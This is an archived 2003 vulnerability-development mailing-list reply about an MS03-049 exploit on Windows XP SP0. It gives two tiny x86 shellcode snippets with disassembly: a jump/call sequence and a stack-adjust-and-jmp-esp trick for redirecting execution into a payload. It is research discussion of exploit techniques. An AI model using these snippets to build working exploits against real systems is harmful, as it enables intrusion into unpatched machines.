Vulnerability Development mailing list archives

Re: ms03-049 exploit xp sp0

From: "upb" <upb () email ee>
Date: Thu, 13 Nov 2003 02:22:18 +0200

heya.
the shortest way i know is :
00000000: EB14                         jmps        000000016
00000002: 832C2440                     sub         d,[esp],040 ;"@"
00000006: E8F5FFFFFF                   call        000000000

11 bytes :(
however, if you know that the code will be on stack, you could do like
00000000: 83EC44                       sub         esp,044 ;"D"
00000003: FFE4                         jmp         esp

upb